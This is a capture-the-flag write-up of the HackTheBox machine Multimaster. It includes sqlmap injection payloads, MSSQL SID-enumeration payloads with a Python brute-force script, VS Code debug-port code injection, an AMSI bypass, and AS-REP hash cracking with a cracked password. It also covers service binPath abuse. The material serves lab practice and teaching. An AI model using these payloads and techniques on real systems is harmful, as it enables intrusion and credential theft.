$ nmap -p- --min-rate 5000 10.129.95.200
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 22:20 +08
Nmap scan report for 10.129.95.200
Host is up (0.011s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49678/tcp open unknown
49687/tcp open unknown
49694/tcp open unknown
RDP is available for this machine, which is not the usual for HackTheBox machines. I did a detailed nmap scan just in case:
$ sudo nmap -p 53,80,88,135,139,445,464,593,636,3268,3269,3389,5985,9389 -sC -sV -O -min-rate 3000 10.129.95.200
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 22:21 +08
Nmap scan report for 10.129.95.200
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: MegaCorp
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-25 14:28:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGACORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: MEGACORP
| NetBIOS_Domain_Name: MEGACORP
| NetBIOS_Computer_Name: MULTIMASTER
| DNS_Domain_Name: MEGACORP.LOCAL
| DNS_Computer_Name: MULTIMASTER.MEGACORP.LOCAL
| DNS_Tree_Name: MEGACORP.LOCAL
| Product_Version: 10.0.14393
|_ System_Time: 2023-06-25T14:28:47+00:00
|_ssl-date: 2023-06-25T14:29:27+00:00; +6m55s from scanner time.
| ssl-cert: Subject: commonName=MULTIMASTER.MEGACORP.LOCAL
| Not valid before: 2023-06-24T14:09:53
|_Not valid after: 2023-12-24T14:09:53
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MULTIMASTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-25T14:28:49
|_ start_date: 2023-06-25T14:10:02
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: MULTIMASTER
| NetBIOS computer name: MULTIMASTER\x00
| Domain name: MEGACORP.LOCAL
| Forest name: MEGACORP.LOCAL
| FQDN: MULTIMASTER.MEGACORP.LOCAL
|_ System time: 2023-06-25T07:28:51-07:00
|_clock-skew: mean: 1h30m55s, deviation: 3h07m51s, median: 6m54s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
We can add megacorp.local and the multimaster.megacorp.local domains to our /etc/hosts file for this machine.
SMB Enumeration
SMB does not allow us to access anything without credentials for this machine.
Employee Hub -> SQL Injection
Port 80 shows us a dashboard of some sorts:
There were some functions, and the one that stood out was the 'Colleague Finder', which took one name parameter.
If nothing is entered, then all the employees are returned.
We can take note of these usernames for later. More importantly, we should see how this thing processes queries. When viewed in Burpsuite, the request simply sent a POST request to /api/getColleagues and it returns a response.
This looks vulnerable to SQL Injection somehow. Every form of injection I tried resulted in a 403 being returned. I noticed one thing however, the Content-Type header said that this app accepts UTF-8 characters.
UTF-8 characters are a bit special as they are denoted like \u12 or something. If I try to use \u12 as the input, I get an error instead of being blocked.
This likely indicates that our query has caused a backend error. Using this, we can try some of the sqlmap tampers that are available:
Tampers are basically scripts that change the characters being sent in to the website. There's a charunicodeescape option that we can try. The final command looks something like this:
The initial attempt tells me there's nothing, and that all requests ended in 403. I tried again with a --delay 3 flag in case there was a WAF blocking my access, and it works. The final command I used was:
The guess of the DBMS being MS-SQL was purely a guess based on usual HTB machine patterns, but obviously this is not always the case! Windows AD can use SQLite3 or MySQL for their backends, especially for web servers!
[22:58:39] [INFO] (custom) POST parameter 'JSON #1*' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
[22:59:04] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:59:17] [INFO] target URL appears to have 5 columns in query
[23:00:51] [INFO] (custom) POST parameter 'JSON #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) POST parameter 'JSON #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 70 HTTP(s) requests:
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"name":"' AND 4943=4943-- fsuJ"}
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: {"name":"';WAITFOR DELAY '0:0:5'--"}
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: {"name":"' WAITFOR DELAY '0:0:5'-- tWyh"}
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: {"name":"-5737' UNION ALL SELECT 68,68,68,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(99)+CHAR(103)+CHAR(105)+CHAR(67)+CHAR(121)+CHAR(77)+CHAR(74)+CHAR(122)+CHAR(117)+CHAR(85)+CHAR(75)+CHAR(99)+CHAR(110)+CHAR(99)+CHAR(76)+CHAR(72)+CHAR(99)+CHAR(70)+CHAR(69)+CHAR(77)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(68)+CHAR(103)+CHAR(66)+CHAR(101)+CHAR(104)+CHAR(118)+CHAR(89)+CHAR(79)+CHAR(117)+CHAR(78)+CHAR(113)+CHAR(76)+CHAR(101)+CHAR(67)+CHAR(71)+CHAR(100)+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(106)+CHAR(113),68-- wUMy"}
Great! Now that we have this, we can attempt to enumerate the database. Here are the results from repeated use of sqlmap:
I found this rather odd. I did a kerbrute to find more users, and found that there were different users found by kerbrute relative to those in the database.
None of the users that I found via kerbrute worked with any of the passwords as well. So we were just left with an SQL Injection on an MSSQL database. Googling for AD enumeration via MSSQL injection led me to this page:
Basically, it is possible for us to find valid usernames using the MSSQL Injection that we have found. Earlier, sqlmap indicated that there were 5 columns present, and that it used UNION injection. Following the above PoC, we can use this payload:
a' union select 1,1,1,1,(select default_domain())--
I used this site to encode it into a suitable UTF-8 format:
Testing it worked!
We can then try to enumerate the Administrator user using this payload:
a' union select 1,1,1,1,(select sys.fn_varbintohexstr(SUSER_SID('megacorp\Administrator')))--
This would result in some hex being returned:
We can use this to send another query that would return usernames and convert the SID for us.
a' union select 1,1,1,1,SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000)--
Now, we just need a way to automate this method. I took the two functions used to convert the hex to a valid SID from the user earlier.
Then, we can fit this SID into a payload with a test number of 1000.
a' union select 1,1,1,1,(SUSER_SNAME(SID_BINARY('S-1-5-21-3167813660-1240564177-918740779-1000')))--
This is the final script I used to automate this method:
import requestsimport jsonimport sysimport structimport timedefprepare_sid(sid): hex_string =bytes.fromhex(sid[2:]) mod_sid =sid_to_str(hex_string) domain_sid_data = mod_sid.split('-')[:7] domain_sid ='-'.join(domain_sid_data)+"-"print(domain_sid+"\n")return domain_sid#Build out the SID stringdefsid_to_str(sid):if sys.version_info.major <3: revision =ord(sid[0])else: revision = sid[0]if sys.version_info.major <3: number_of_sub_ids =ord(sid[1])else: number_of_sub_ids = sid[1] iav = struct.unpack('>Q', b'\x00\x00'+ sid[2:8])[0] sub_ids = [struct.unpack('<I', sid[8+4* i:12+4* i])[0]for i inrange(number_of_sub_ids)]return'S-{0}-{1}-{2}'.format(revision, iav, '-'.join([str(sub_id) for sub_id in sub_ids]))defutfme(str): val = []for i instr: val.append("\\u00"+hex(ord(i)).split("x")[1])return''.join([i for i in val])sid =prepare_sid('0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000')url ='http://megacorp.local/api/getColleagues'for i inrange (500,10000): payload =f"a' union select 1,1,1,1,(SUSER_SNAME(SID_BINARY('S-1-5-21-3167813660-1240564177-918740779-{i}')))--" encoded_payload =utfme(payload) r = requests.post(url, data='{"name":"'+utfme(payload) +'"}',headers={'Content-Type': 'Application/json'}) data = json.loads(r.text) src_value = data[0]['src']try: username = src_value.split('\\')[1]print(username)except:print('nope!') time.sleep(3)
This would slowly brute force all the users out. I included the 'nope!' part to let me know that the script was still running fine. This script takes quite long...but eventually we would get some valid users. Here's what the output of my script looks like:
There are a lot of groups starting at 500, so I changed it up and started at 1000 instead, which is where user IDs should start. Because this was taking so long, everytime I found a valid user I would test the credentials immediately. Eventually, it found these users:
...
DnsUpdateProxy
svc-nas
nope!
Privileged IT Accounts
nope!
nope!
nope!
nope!
tushikikatomo
andrew
lana
...
The current user had no privileges or anything of interest. Since we had a shell, we can do some basic enumeration like finding the other users present:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/7/2020 7:24 PM .NET v4.5
d----- 1/7/2020 7:24 PM .NET v4.5 Classic
d----- 1/9/2020 3:18 AM Administrator
d----- 3/9/2020 3:20 AM alcibiades
d----- 3/9/2020 2:53 AM cyork
d----- 1/9/2020 5:14 PM jorden
d----- 3/7/2020 8:38 AM MSSQLSERVER
d-r--- 11/20/2016 5:24 PM Public
d----- 1/9/2020 5:12 PM sbauer
d----- 3/7/2020 8:38 AM SQLTELEMETRY
In the C:\ directory, there were some interesting folders:
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 12:41 PM DFSRoots
d----- 1/7/2020 7:23 PM inetpub
d----- 9/25/2019 5:01 AM PerfLogs
d-r--- 7/19/2021 1:07 AM Program Files
d----- 1/9/2020 1:18 PM Program Files (x86)
d-r--- 1/9/2020 5:14 PM Users
d----- 7/19/2021 1:29 AM Windows
The DFSRoots gives me a weird error regarding network location:
*Evil-WinRM* PS C:\DFSRoots\dfs\Development> dir
The network location cannot be reached. For information about network troubleshooting, see Windows Help.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : ReadError: (C:\DFSRoots\dfs\Development:String) [Get-ChildItem], IOException
+ FullyQualifiedErrorId : DirIOError,Microsoft.PowerShell.Commands.GetChildItemCommand
We probably don't have the permissions for this yet. We also cannot access the inetpub directory:
*Evil-WinRM* PS C:\inetpub\wwwroot> dir
Access to the path 'C:\inetpub\wwwroot' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\inetpub\wwwroot:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Within the C:\Program Files directory, we can see that Microsoft Visual Studio is installed.
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:59 AM Common Files
d----- 1/9/2020 2:39 PM Internet Explorer
d----- 1/7/2020 9:40 PM Microsoft
da---- 1/7/2020 7:47 PM Microsoft SQL Server
d----- 1/7/2020 7:26 PM Microsoft Visual Studio 10.0
da---- 1/9/2020 3:18 AM Microsoft VS Code
d----- 1/7/2020 7:27 PM Microsoft.NET
d----- 1/7/2020 9:43 PM Reference Assemblies
d----- 7/19/2021 1:07 AM VMware
d-r--- 1/9/2020 2:46 PM Windows Defender
d----- 1/9/2020 2:39 PM Windows Mail
d----- 1/9/2020 2:39 PM Windows Media Player
d----- 7/16/2016 6:23 AM Windows Multimedia Platform
d----- 7/16/2016 6:23 AM Windows NT
d----- 1/9/2020 2:39 PM Windows Photo Viewer
d----- 7/16/2016 6:23 AM Windows Portable Devices
d----- 7/16/2016 6:23 AM WindowsPowerShell
The Windows SQL Server is also not default. Before we delve further into a specific software, I wanted to run bloodhound-python to get more information about the domain.
$ bloodhound-python -d megacorp.local -u tushikikatomo -p 'finance1' -c all -ns 10.129.95.200
INFO: Found AD domain: megacorp.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: MULTIMASTER.MEGACORP.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: MULTIMASTER.MEGACORP.LOCAL
INFO: Found 28 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 10 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MULTIMASTER.MEGACORP.LOCAL
INFO: Done in 00M 02S
Start Bloodhound and upload the information as usual. Then, we can check each user from the C:\Users directory to identify if there are ACLs to abuse.
First, we find that cyork is part of the Developers group:
There are no outbound object controls for this, indicating that this group might have access to somestuff on the machine.
We can also find that the sbauer user has some privileges over jorden.
The rest of the users don't have anything interesting about them. I also used PrivescCheck.ps1 to enumerate for me since WinPEAS was not working for some reason. Here was the interesting output:
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
| | parsing the registry. |
+------+-------------------------------------------------------+
[*] Found 8 result(s).
Name FullName
---- --------
Microsoft SQL Server C:\Program Files (x86)\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files (x86)\Microsoft Visual Studio 10.0
Microsoft C:\Program Files\Microsoft
Microsoft SQL Server C:\Program Files\Microsoft SQL Server
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
Microsoft VS Code C:\Program Files\Microsoft VS Code
VMware C:\Program Files\VMware
VMware Tools C:\Program Files\VMware\VMware Tools
+------+------------------------------------------------+------+
| TEST | APPS > Running Processes | INFO |
+------+------------------------------------------------+------+
| DESC | List processes that are not owned by the current user |
| | and filter out common processes such as |
| | 'svchost.exe'. |
+------+-------------------------------------------------------+
[*] Found 37 result(s).
Name Id Path SessionId User
---- -- ---- --------- ----
Code 988 1
Code 2252 1
Code 2272 1
Code 3172 1
Code 4628 1
Code 5260 1
Code 5304 1
Code 5484 1
Code 5488 1
Code 6036 1
IPv4 TCP 127.0.0.1:18256 LISTENING 2252 Code
IPv4 TCP 127.0.0.1:30980 LISTENING 5304 Code
IPv4 TCP 127.0.0.1:46973 LISTENING 5032 Code
For some reason, Visual Studio was running a lot of processes and even had some ports open for it.
VS Code -> Cyork Shell
There were loads of processes run as Code, so let's take a look at that. The VS Code directory had some files within it.
Within the Microsoft VS Code file, there was a Code.exe binary present, and I found this StackOverflow post that gave me the command to find its version (I was struggling to run .\Code.exe --version previously).
*Evil-WinRM* PS C:\Program Files\Microsoft VS Code> (Get-Command .\code.exe).version
Major Minor Build Revision
----- ----- ----- --------
1 37 1 0
Then, we can enumerate the possible exploits.
This machine was released in 2020, so we can ignore the 2023 exploits. There was only one Privilege Escalation one which looked promising as it involved injecting code into existing processes.
The exploit involves exploiting the debug ports that are left open by the process, and we should be able to get RCE for the user context that Code.exe runs in.
VS Code is built on Electron, so we should be looking for exploits that are able to communicate with the port that is open. On Hacktricks, there's a page detailing CEF Deug abuse using cefdebug.exe.
We can grab a copy of the compiled binary and transfer it to the machine. We can first run it to find the target port we want.
*Evil-WinRM* PS C:\users\alcibiades> .\cefdebug.exe
cefdebug.exe : [2023/06/25 22:49:29:8700] U: There are 3 tcp sockets in state listen.
+ CategoryInfo : NotSpecified: ([2023/06/25 22:...n state listen.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
[2023/06/25 22:49:49:9161] U: There were 1 servers that appear to be CEF debuggers.
[2023/06/25 22:49:49:9161] U: ws://127.0.0.1:52954/0c8874f7-9688-4ce6-ae33-973747ba8969
This exploit was weird, as it took me ages to get a shell, but I eventually did.
The Web.Config file doesn't seem to use it, making it weirder. I downloaded this file back to my machien for some reverse engineering. Since it was a DLL file, we can open it up in DnSpy.exe.
Within it, we can find some hardcoded credentials:
Since we have access to the C:\Users directory, we can check which user is this password valid with, and sbauer is the one!
$ crackmapexec smb megacorp.local -u sbauer -p 'D3veL0pM3nT!'
SMB megacorp.local 445 MULTIMASTER [*] Windows Server 2016 Standard 14393 x64 (name:MULTIMASTER) (domain:MEGACORP.LOCAL) (signing:True) (SMBv1:True)
SMB megacorp.local 445 MULTIMASTER [+] MEGACORP.LOCAL\sbauer:D3veL0pM3nT!
We can then evil-winrm in as this user:
GenericWrite -> Jorden Shell
From the Bloodhond we did earlier, we can see that this user has GenericWrite privileges over jorden:
To exploit this, we can use PowerView.ps1. However, it seems AMSI is blocking us:
*Evil-WinRM* PS C:\Users\sbauer\Documents> . .\Power.ps1
At C:\Users\sbauer\Documents\Power.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At C:\Users\sbauer\Documents\Power.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
This is pretty easy to bypass since we have an evil-winrm shell. We can just use Bypass-4MSI to do so:
$ john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rainforest786 ($krb5asrep$23$jorden@MEGACORP)
1g 0:00:00:02 DONE (2023-06-26 14:33) 0.3484g/s 1533Kp/s 1533Kc/s 1533KC/s rainian..raincole
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Server Operators -> Root
jorden has loads of privileges available and is part of a lot of groups:
*Evil-WinRM* PS C:\Users\jorden\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\jorden\Documents> net user jorden
User name jorden
Full Name Jorden Mclean
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:48:17 PM
Password expires Never
Password changeable 1/10/2020 5:48:17 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/25/2023 11:39:57 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Server Operators
Global Group memberships *Domain Users *Developers
Technically, SeBackupPrivilege allows us to read the root.txt directly, but getting an admin shell is of course better. So since we are part of the Server Operators group, we can start our enumeration from there.
From Hacktricks, I gathered that the Server Operators group was able to do these:
All of these are not super interesting, except for the last one. We can control local services, meaning that we can do stuff like change service paths to run payloads as the SYSTEM user. As such, I used PowerUp.ps1 to do my checks on what services I could manipulate.
This didn't work because it seems that we cannot access the Service Manager:
*Evil-WinRM* PS C:\> sc.exe query type= service
[SC] OpenSCManager FAILED 5:
Access is denied.
I couldn't run WinPEAS on the machine, so I used my own Windows host to find a service that we could edit, and this took a while.
We can find all the services using reg query:
*Evil-WinRM* PS C:\Users\jorden\Documents> reg query HKLM\system\currentcontrolset\services
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET CLR Data
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET CLR Networking
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET CLR Networking 4.0.0.0
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET Data Provider for Oracle
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET Data Provider for SqlServer
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NET Memory Cache 4.0
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\.NETFramework
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\1394ohci
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\3ware
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ACPI
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\AcpiDev
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\acpiex
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\acpipagr
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\AcpiPmi
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\acpitime
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ADOVMPPackage
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ADP80XX
<TRUNCATED>
Within this huge list, there were loads of services that weren't valid to use because they were already running or I could not edit the binPath variable.
Used 0xdf's writeup because I got lazy finding the service lol.
The first service I noticed were browser and bowser. I just thought the latter was funny, but the former was one that we could abuse. First, we just need to change the binpath and then run start to start it again. This gives us a root shell.
